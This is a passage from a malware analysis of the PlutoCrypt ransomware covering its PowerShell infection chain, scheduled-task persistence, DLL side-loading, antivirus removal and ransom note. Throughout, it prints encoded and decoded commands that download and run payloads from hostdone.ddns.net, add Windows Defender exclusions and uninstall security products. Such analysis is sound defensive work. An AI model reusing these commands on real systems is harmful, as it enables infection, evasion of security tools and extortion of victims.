I’ve set a breakpoint on the line of oL2J declaration and restarted the page, now we can have a look at the Global variables scope and see what both wobj and str4 have inside of them:

oL2J will be a Wscript.Shell object that will run encoded PowerShell script.

Embedded PowerShell Execution

Extracted PowerShell Script:

cmd /C powershell -exec bypass -enc YwBtAGQAIAAvAEMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIABjAGQAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQA7ACAAYwBkACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAOwAgAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AeAAxAC4AeABtAGwAJwAgAC0AbwB1AHQAZgBpAGwAZQAgACcAeAAuAHgAbQBsACcAOwAgAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AdABhAHMAawAuAHgAbQBsACcAIAAtAG8AdQB0AGYAaQBsAGUAIAAnAHQAYQBzAGsALgB4AG0AbAAnADsAIABpAG4AdgBvAGsAZQAtAHcAZQBiAHIAZQBxAHUAZQBzAHQAIAAtAHUAcgBpACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQAZABvAG4AZQAuAGQAZABuAHMALgBuAGUAdAAvAHQALgBwAGQAJwAgAC0AbwB1AHQAZgBpAGwAZQAgACcAaQBvAHQAbABvAGcALgBwAGQAZgAnADsAIABzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AQwByAGUAYQB0AGUAIAAvAFgATQBMACAAJwB0AGEAcwBrAC4AeABtAGwAJwAgAC8AdABuACAAJwB0AGEAcwBrAG4AYQBtAGUAJwA7ACAAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACcAaQBvAHQAbABvAGcALgBwAGQAZgAnADsAIABzAGMAaAB0AGEAcwBrAHMAIAAvAHIAdQBuACAALwB0AG4AIAAnAHQAYQBzAGsAbgBhAG0AZQAnADsA

Let’s deobfuscate it quickly:

import base64

ENCODED_POWERSHELL = 'YwBtAGQAIAAvAEMAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIABjAGQAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQA7ACAAYwBkACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAOwAgAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AeAAxAC4AeABtAGwAJwAgAC0AbwB1AHQAZgBpAGwAZQAgACcAeAAuAHgAbQBsACcAOwAgAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AdABhAHMAawAuAHgAbQBsACcAIAAtAG8AdQB0AGYAaQBsAGUAIAAnAHQAYQBzAGsALgB4AG0AbAAnADsAIABpAG4AdgBvAGsAZQAtAHcAZQBiAHIAZQBxAHUAZQBzAHQAIAAtAHUAcgBpACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQAZABvAG4AZQAuAGQAZABuAHMALgBuAGUAdAAvAHQALgBwAGQAJwAgAC0AbwB1AHQAZgBpAGwAZQAgACcAaQBvAHQAbABvAGcALgBwAGQAZgAnADsAIABzAGMAaAB0AGEAcwBrAHMALgBlAHgAZQAgAC8AQwByAGUAYQB0AGUAIAAvAFgATQBMACAAJwB0AGEAcwBrAC4AeABtAGwAJwAgAC8AdABuACAAJwB0AGEAcwBrAG4AYQBtAGUAJwA7ACAAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgACcAaQBvAHQAbABvAGcALgBwAGQAZgAnADsAIABzAGMAaAB0AGEAcwBrAHMAIAAvAHIAdQBuACAALwB0AG4AIAAnAHQAYQBzAGsAbgBhAG0AZQAnADsA'

print(base64.b64decode(ENCODED_POWERSHELL).replace(b'\x00',b'').decode())

cmd /C powershell -exec bypass -c cd $env:appdata; cd $env:appdata; invoke-webrequest -uri 'http://hostdone.ddns.net/x1.xml' -outfile 'x.xml'; invoke-webrequest -uri 'http://hostdone.ddns.net/task.xml' -outfile 'task.xml'; invoke-webrequest -uri 'http://hostdone.ddns.net/t.pd' -outfile 'iotlog.pdf'; schtasks.exe /Create /XML 'task.xml' /tn 'taskname'; start-process 'iotlog.pdf'; schtasks /run /tn 'taskname';

The deobfuscated PowerShell script will download 3 files and save them in the AppData folder, it than will execute two of the downloaded files, one by simply starting a process with it (iotlog.pdf) which is a junk file with no actual purpose.
(start-process 'iotlog.pdf') The second execution will be by creating a schedule task using one of the downloaded xml files (task.xml, schtasks.exe /Create /XML 'task.xml' /tn 'taskname') and then it will execute the task. (schtasks /run /tn 'taskname')

Tasks Madness

task.xml

Let’s start with the first scheduled task:

 version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  
    2023-04-03T00:54:30
    \pc
    rufus.com
    \task
  
  
    
      1910-01-01T00:00:00
      true
    
  
  
     id="Author">
      InteractiveToken
      LeastPrivilege
    
  
  
    IgnoreNew
    true
    true
    true
    false
    false
    
      true
      false
    
    true
    true
    true
    false
    false
    true
    false
    PT72H
    7
  
   Context="Author">
    
      cmd
      /c start /min powershell -w hidden -exec bypass -enc TgBlAHcALQBJAHQAZQBtACAAJwBcAFwAPwBcAEMAOgBcAFcAaQBuAGQAbwB3AHMAIABcAFMAeQBzAHQAZQBtADMAMgAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQANAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAFAAYQB0AGgAIAAnAFwAXAA/AFwAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyACcADQAKAGMAbwBwAHkAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAdABhAHMAawBtAGcAcgAuAGUAeABlACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAB0AGEAcwBrAG0AZwByAC4AZQB4AGUAIgANAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAFAAYQB0AGgAIAAnAFwAXAA/AFwAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyACcADQAKAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AdQAuAGQAbAAnACAALQBvAHUAdABmAGkAbABlACAAJwB1AHgAdABoAGUAbQBlAC4AZABsAGwAJwANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBwAGEAdABoACAAJwBDADoAXAB3AGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAB0AGEAcwBrAG0AZwByAC4AZQB4AGUAJwA=
    
  

Yet another embedded PowerShell script, let’s deobfuscate it and see what it lays beneath the obfuscation:

ENCODED_POWERSHELL2 = 'TgBlAHcALQBJAHQAZQBtACAAJwBcAFwAPwBcAEMAOgBcAFcAaQBuAGQAbwB3AHMAIABcAFMAeQBzAHQAZQBtADMAMgAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQANAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAFAAYQB0AGgAIAAnAFwAXAA/AFwAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyACcADQAKAGMAbwBwAHkAIABDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAdABhAHMAawBtAGcAcgAuAGUAeABlACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAB0AGEAcwBrAG0AZwByAC4AZQB4AGUAIgANAAoAUwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AIAAtAFAAYQB0AGgAIAAnAFwAXAA/AFwAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyACcADQAKAGkAbgB2AG8AawBlAC0AdwBlAGIAcgBlAHEAdQBlAHMAdAAgAC0AdQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AdQAuAGQAbAAnACAALQBvAHUAdABmAGkAbABlACAAJwB1AHgAdABoAGUAbQBlAC4AZABsAGwAJwANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBwAGEAdABoACAAJwBDADoAXAB3AGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAB0AGEAcwBrAG0AZwByAC4AZQB4AGUAJwA='

print(base64.b64decode(ENCODED_POWERSHELL2).replace(b'\x00',b'').decode())

New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
copy C:\Windows\System32\taskmgr.exe "C:\windows \System32\taskmgr.exe"
Set-Location -Path '\\?\C:\Windows \System32'
invoke-webrequest -uri 'http://hostdone.ddns.net/u.dl' -outfile 'uxtheme.dll'
Start-Process -Filepath 'C:\windows \System32\taskmgr.exe'

The script will do 3 things:

It will Create a new System32 Folder, it will then copy taskmgr.exe from the original System32 folder to the freshly created System32 folder.
what is special about this that it will duplicate the Windows folder of the user and create an empty System32 Folder, If we run the commands manually we can see that another Windows Folder is created with all the content of the original Windows folder but the System32 folder is empty.

Another payload will be downloaded from the attacker server and will be saved on the impersonated System32 folder by the name uxtheme.dll
The script will execute taskmgr.exe
DLL Side Loading

If we take a look at the imports of taskmgr.exe we can find that it loads uxtheme.dll:

The TA leverages the DLL Search Order in order to accomplish DLL Side Loading and load the retrieved payload. I’ve opened the DLL in IDA and it’s pretty straight forward, all Exports will either lead to SetWindowTheme or OpenThemeData which both will have a similar command that will be executed using WinExec:

The command:

cmd /c cd %appdata% & SCHTASKS /Create /TN \"onedrive\" /XML \"x.xml\" & SCHTASKS /RUN /TN \"onedrive\"

The command will create yet another task with the name of onedrive\ with the content of x.xml which was fetched from the attacker server at alongside with task.xml and it will execute the task.

x.xml

Let’s observe the content of the xml file:

 version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  
    2021-05-20T06:39:04
    
    \OneDrive Status Checker Start
  
  
    
      true
      PT30S
    
  
  
     id="Author">
      S4U
      HighestAvailable
    
  
  
    IgnoreNew
    false
    true
    true
    false
    false
    
      true
      false
    
    true
    true
    false
    false
    false
    PT72H
    7
  
   Context="Author">
    
      cmd.exe
      /C "PowerShell -Nologo -NoProfile -ExecutionPolicy Bypass -E "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQARQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQARQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgA=" & PowerShell -Nologo -NoProfile -ExecutionPolicy Bypass -E "YwBkACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEADQAKAGMAbQBkACAALwBjACAAdwBtAGkAYwAgAC8AbwB1AHQAcAB1AHQAOgAlAGEAcABwAGQAYQB0AGEAJQBcAGwAaQBzAHQAcAByAC4AdAB4AHQAIABwAHIAbwBkAHUAYwB0ACAAZwBlAHQAIABuAGEAbQBlAA0ACgBjAG0AZAAgAC8AYwAgAHQAeQBwAGUAIABsAGkAcwB0AHAAcgAuAHQAeAB0ACAAfAAgAGYAaQBuAGQAcwB0AHIAIAAvAEkAIAAiAG4AYQBtAGUAIABhAHYAYQBzAHQAIABlAHMAZQB0ACAAbgBvAHIAdABvAG4AIABhAG4AdABpAHYAaQByAHUAcwAgAGEAdgBpAHIAYQAgAGsAYQBzAHAAZQByAHMAawB5ACAAbQBjAGEAZgBlAGUAIABwAGEAbgBkAGEAIABtAGEAbAB3AGEAcgBlAGIAeQB0AGUAcwAgAGYALQBTAGUAYwB1AHIAZQAgAHMAeQBtAGEAbgB0AGUAYwAgACIAIAA+ACAAYQBhAHAAcgAuAHQAeAB0AA0ACgAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAGEAYQBwAHIALgB0AHgAdAApAC4AVAByAGkAbQAoACkAIAAtAG4AZQAgACcAJwAgAHwAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIABsAGkAcwB0AGQALgB0AHgAdAANAAoAJAB4AGEAIAA9ACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIABsAGkAcwB0AGQALgB0AHgAdAApAFsAMQBdAA0ACgAkAHgAYgAgAD0AIAAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAGwAaQBzAHQAZAAuAHQAeAB0ACkAWwAyAF0ADQAKACQAeABjACAAPQAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAbABpAHMAdABkAC4AdAB4AHQAKQBbADMAXQANAAoAJAB4AGQAIAA9ACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIABsAGkAcwB0AGQALgB0AHgAdAApAFsANABdAA0ACgAkAGEAcABwAGwAYQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBkAHUAYwB0ACAALQBGAGkAbAB0AGUAcgAgACIATgBhAG0AZQAgAD0AIAAnACQAeABhACcAIgANAAoAJABhAHAAcABsAGEALgBVAG4AaQBuAHMAdABhAGwAbAAoACkADQAKACQAYQBwAHAAbABiACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAFAAcgBvAGQAdQBjAHQAIAAtAEYAaQBsAHQAZQByACAAIgBOAGEAbQBlACAAPQAgACcAJAB4AGIAJwAiAA0ACgAkAGEAcABwAGwAYgAuAFUAbgBpAG4AcwB0AGEAbABsACgAKQANAAoAJABhAHAAcABsAGMAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AQwBsAGEAcwBzACAAVwBpAG4AMwAyAF8AUAByAG8AZAB1AGMAdAAgAC0ARgBpAGwAdABlAHIAIAAiAE4AYQBtAGUAIAA9ACAAJwAkAHgAYwAnACIADQAKACQAYQBwAHAAbABjAC4AVQBuAGkAbgBzAHQAYQBsAGwAKAApAA0ACgAkAGEAcABwAGwAZAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBkAHUAYwB0ACAALQBGAGkAbAB0AGUAcgAgACIATgBhAG0AZQAgAD0AIAAnACQAeABkACcAIgANAAoAJABhAHAAcABsAGQALgBVAG4AaQBuAHMAdABhAGwAbAAoACkA" & PowerShell -Nologo -NoProfile -ExecutionPolicy Bypass -E YwBkACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQAvAGgAbwBsAG8ALgB0AHgAdAAgACcAYgBlAG4AaQAgAGIAdQByAGEAZABhACAAYgAxAXIAYQBrACcACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQAZABvAG4AZQAuAGQAZABuAHMALgBuAGUAdAAvAHAAbAAuAGUAeABlACcAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGwALgBlAHgAZQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AZQAnACAALQBPAHUAdABGAGkAbABlACAAZQBuAGMALgB4AG0AbAAKAGMAZAAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAAoAUwBDAEgAVABBAFMASwBTACAALwBDAHIAZQBhAHQAZQAgAC8AVABOACAAIgBlAG4AYwAiACAALwBYAE0ATAAgACIAZQBuAGMALgB4AG0AbAAiAAoAYwBtAGQAIAAvAGMAIABzAGMAaAB0AGEAcwBrAHMAIAAgAC8AUgBVAE4AIAAvAFQATgAgACIAZQBuAGMAIgA= & exit"
    
  

As we can see this task contains 3 different PowerShell scripts that will be executed. Let’s break them one by one:

AntiVirus/EDR Evasion

ENCODED_POWERSHELL3 = 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQARQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAHAAcABEAGEAdABhAAoAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQARQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUACgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgA='

print(base64.b64decode(ENCODED_POWERSHELL3).replace(b'\x00',b'').decode())

Add-MpPreference -ExclusionPath $Env:USERPROFILE\AppData
Add-MpPreference -ExclusionPath $Env:USERPROFILE
Add-MpPreference -ExclusionProcess "powershell.exe"

The first script will exclude the User path, the AppData folder and anything that is being run under the process: powershell.exe from Windows Defender.
Moving on to the second script:

ENCODED_POWERSHELL4 = 'YwBkACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEADQAKAGMAbQBkACAALwBjACAAdwBtAGkAYwAgAC8AbwB1AHQAcAB1AHQAOgAlAGEAcABwAGQAYQB0AGEAJQBcAGwAaQBzAHQAcAByAC4AdAB4AHQAIABwAHIAbwBkAHUAYwB0ACAAZwBlAHQAIABuAGEAbQBlAA0ACgBjAG0AZAAgAC8AYwAgAHQAeQBwAGUAIABsAGkAcwB0AHAAcgAuAHQAeAB0ACAAfAAgAGYAaQBuAGQAcwB0AHIAIAAvAEkAIAAiAG4AYQBtAGUAIABhAHYAYQBzAHQAIABlAHMAZQB0ACAAbgBvAHIAdABvAG4AIABhAG4AdABpAHYAaQByAHUAcwAgAGEAdgBpAHIAYQAgAGsAYQBzAHAAZQByAHMAawB5ACAAbQBjAGEAZgBlAGUAIABwAGEAbgBkAGEAIABtAGEAbAB3AGEAcgBlAGIAeQB0AGUAcwAgAGYALQBTAGUAYwB1AHIAZQAgAHMAeQBtAGEAbgB0AGUAYwAgACIAIAA+ACAAYQBhAHAAcgAuAHQAeAB0AA0ACgAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAGEAYQBwAHIALgB0AHgAdAApAC4AVAByAGkAbQAoACkAIAAtAG4AZQAgACcAJwAgAHwAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIABsAGkAcwB0AGQALgB0AHgAdAANAAoAJAB4AGEAIAA9ACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIABsAGkAcwB0AGQALgB0AHgAdAApAFsAMQBdAA0ACgAkAHgAYgAgAD0AIAAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAGwAaQBzAHQAZAAuAHQAeAB0ACkAWwAyAF0ADQAKACQAeABjACAAPQAgACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAbABpAHMAdABkAC4AdAB4AHQAKQBbADMAXQANAAoAJAB4AGQAIAA9ACAAKABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIABsAGkAcwB0AGQALgB0AHgAdAApAFsANABdAA0ACgAkAGEAcABwAGwAYQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBkAHUAYwB0ACAALQBGAGkAbAB0AGUAcgAgACIATgBhAG0AZQAgAD0AIAAnACQAeABhACcAIgANAAoAJABhAHAAcABsAGEALgBVAG4AaQBuAHMAdABhAGwAbAAoACkADQAKACQAYQBwAHAAbABiACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAFAAcgBvAGQAdQBjAHQAIAAtAEYAaQBsAHQAZQByACAAIgBOAGEAbQBlACAAPQAgACcAJAB4AGIAJwAiAA0ACgAkAGEAcABwAGwAYgAuAFUAbgBpAG4AcwB0AGEAbABsACgAKQANAAoAJABhAHAAcABsAGMAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0AQwBsAGEAcwBzACAAVwBpAG4AMwAyAF8AUAByAG8AZAB1AGMAdAAgAC0ARgBpAGwAdABlAHIAIAAiAE4AYQBtAGUAIAA9ACAAJwAkAHgAYwAnACIADQAKACQAYQBwAHAAbABjAC4AVQBuAGkAbgBzAHQAYQBsAGwAKAApAA0ACgAkAGEAcABwAGwAZAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBkAHUAYwB0ACAALQBGAGkAbAB0AGUAcgAgACIATgBhAG0AZQAgAD0AIAAnACQAeABkACcAIgANAAoAJABhAHAAcABsAGQALgBVAG4AaQBuAHMAdABhAGwAbAAoACkA'

print(base64.b64decode(ENCODED_POWERSHELL4).replace(b'\x00',b'').decode())

cd $env:APPDATA
cmd /c wmic /output:%appdata%\listpr.txt product get name
cmd /c type listpr.txt | findstr /I "name avast eset norton antivirus avira kaspersky mcafee panda malwarebytes f-Secure symantec " > aapr.txt
(Get-Content aapr.txt).Trim() -ne '' | Set-Content listd.txt
$xa = (Get-Content listd.txt)[1]
$xb = (Get-Content listd.txt)[2]
$xc = (Get-Content listd.txt)[3]
$xd = (Get-Content listd.txt)[4]
$appla = Get-WmiObject -Class Win32_Product -Filter "Name = '$xa'"
$appla.Uninstall()
$applb = Get-WmiObject -Class Win32_Product -Filter "Name = '$xb'"
$applb.Uninstall()
$applc = Get-WmiObject -Class Win32_Product -Filter "Name = '$xc'"
$applc.Uninstall()
$appld = Get-WmiObject -Class Win32_Product -Filter "Name = '$xd'"
$appld.Uninstall()

The second script will have several activitires:

Save all installed products names to a listpr.txt using the command wmic.
By using the findstr, the script will look for products with AV’s names and it will save the results to aapr.txt.
The script will rewrite the content of aapr.txt to listd.txt after a trim
The script will take only 4 product names (index 1-4)
The script will uninstall the applications based on the product names.

The purpose of the script is to remove AV related products to ensure that nothing will flag the rest of the execution flow.

Final Payload Fetching

let’s analyze the last script:

ENCODED_POWERSHELL5 = 'YwBkACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEACgBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQAvAGgAbwBsAG8ALgB0AHgAdAAgACcAYgBlAG4AaQAgAGIAdQByAGEAZABhACAAYgAxAXIAYQBrACcACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQAZABvAG4AZQAuAGQAZABuAHMALgBuAGUAdAAvAHAAbAAuAGUAeABlACcAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGwALgBlAHgAZQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdABkAG8AbgBlAC4AZABkAG4AcwAuAG4AZQB0AC8AZQAnACAALQBPAHUAdABGAGkAbABlACAAZQBuAGMALgB4AG0AbAAKAGMAZAAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhAAoAUwBDAEgAVABBAFMASwBTACAALwBDAHIAZQBhAHQAZQAgAC8AVABOACAAIgBlAG4AYwAiACAALwBYAE0ATAAgACIAZQBuAGMALgB4AG0AbAAiAAoAYwBtAGQAIAAvAGMAIABzAGMAaAB0AGEAcwBrAHMAIAAgAC8AUgBVAE4AIAAvAFQATgAgACIAZQBuAGMAIgA='

print(base64.b64decode(ENCODED_POWERSHELL5).replace(b'\x00',b'').decode())

cd $env:appdata
Set-Content $env:appdata/holo.txt 'beni burada b1rak'
Invoke-WebRequest -Uri 'http://hostdone.ddns.net/pl.exe' -OutFile pl.exe
Invoke-WebRequest -Uri 'http://hostdone.ddns.net/e' -OutFile enc.xml
cd $env:appdata
SCHTASKS /Create /TN "enc" /XML "enc.xml"
cmd /c schtasks  /RUN /TN "enc"

This final script has several things it does:

Creates a junk file holo.txt with the text beni burada b1 rak (translated to: leave me here [Mr. Robot Reference?])
Downloads 2 files from the remote server: pl.exe and enc.xml
Creates a task with the name of enc alongside with the content of enc.xml and then executes it.

enc.xml

Once again, let’s check the content of the downloaded xml file:

 version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  
    2021-05-20T06:39:04
    
    \enc
  
   />
  
     id="Author">
      InteractiveToken
      HighestAvailable
    
  
  
    IgnoreNew
    true
    true
    true
    false
    false
    
      true
      false
    
    true
    true
    false
    false
    false
    PT72H
    7
  
   Context="Author">
    
      %appdata%\pl.exe
    
  

The task has a single command that it will execute and it’s to simply run the freshly retrieved payload pl.exe which will be the actual ransomware payload.

PlutoCrypt Analysis

Static Information

PlutoCrypt is 32Bit .NET ransomware, as we can see by DiE analyze:

Opening the binary in DnSpy, an incriminating evidence pops up exposing that our ransomware is based on the CryptoJoker ransomware (which is actually an open source malware that can be found here):

Code Comparison

First, we will have a look at the main fuction:

Well it’s very much identical, you can see also that our PlutoCrypt ransomware has a method called JokerIsNotRunning which is also presented in the same place at the original code.
PlutoCrypt expands the infection method that was initally written in CryptoJoker as can be seen here:

CryptoJoker was supposed to only encrypt the %USERPROFILE% related path but PlutoCrypt expands the infection to some additional possible drivers that might be installed on the victim’s computer.

Ransom Note

	Bu Bilgisayarın Güvenliği Ihlal Edilmiştir !!

PlutoCrypt bu bilgisayardaki tüm verileri askeri düzeyde RSA-4096 ile şifrelenmiştir.
Verilerinizi geri kurtarabilmek için bize 72 saat içinde 10.000 TL ödemenizi rica etmekteyiz.
Eğer ilk 24 saat içerisinde ödeme yapılırsa %40 indirimle 6.000 TL talep etmekteyiz.

Yaptığımız işi ciddiye alıyoruz verilerin hassas veya önemli olabileceğini biliyoruz.
Ödemenizi 72 saat içinde yapmadığınız taktirde; verilerinizi kurtarabileceğiniz anahtar kalıcı olarak silinecektir aynı zamanda bilgisayardaki tüm veriler internette herkeze açık paylaşılacaktır.

Ödeme yapılmazsa paylaşılacak verileriniz; 
1) Bilgisayarda şifrelenen tüm dosyalarınız (fotoğraf, belgeleriniz vs.) 
2) Tarayıcınızdan girdiğiniz "Whatsapp Web", "outlook", "gmail" ve bilgisayarınızda yüklü uygulamalara ait tüm mailleşme/mesajlaşmalarınızın birer kopyası da offline olarak paylaşılacaktır.

Bitcoin ile ödeme yapmanız ve şifre çözücü anahtarı almanız kredi/banka kartı sahibiyseniz 1 saat sürmektedir.
Işlemleriniz için sifre@pluton.pw mail adresine vakit kaybetmeden ulaşınız. 
(NOT: Eğer 2 saat içerisinde geri dönüş alamadıysanız spam kutusuna bakınız.) 
Kişisel id'niz: [HWID goes here]

Translation:

This Computer Has Been Breached !!

PlutoCrypt all data on this computer is encrypted with military grade RSA-4096.
In order to recover your data, we ask you to pay us 10,000 TL within 72 hours.
If payment is made within the first 24 hours, we request 6,000 TL with a 40% discount.

We take what we do seriously and we know that data can be sensitive or important.
If you do not make your payment within 72 hours; The key with which you can recover your data will be permanently deleted, and at the same time, all data on the computer will be shared publicly on the internet.

Your data to be shared if payment is not made;
1) All your encrypted files (photos, documents, etc.)
2) A copy of each of your "Whatsapp Web", "outlook", "gmail" and applications installed on your computer will be shared offline.

If you are a credit/debit card holder, it takes 1 hour to pay with Bitcoin and receive the decryption key.
For your transactions, please contact sifre@pluton.pw without delay.
(NOTE: If you haven't received a response within 2 hours, check your spam box.)
Your personal id: [HWID goes here]

New Victim Notification

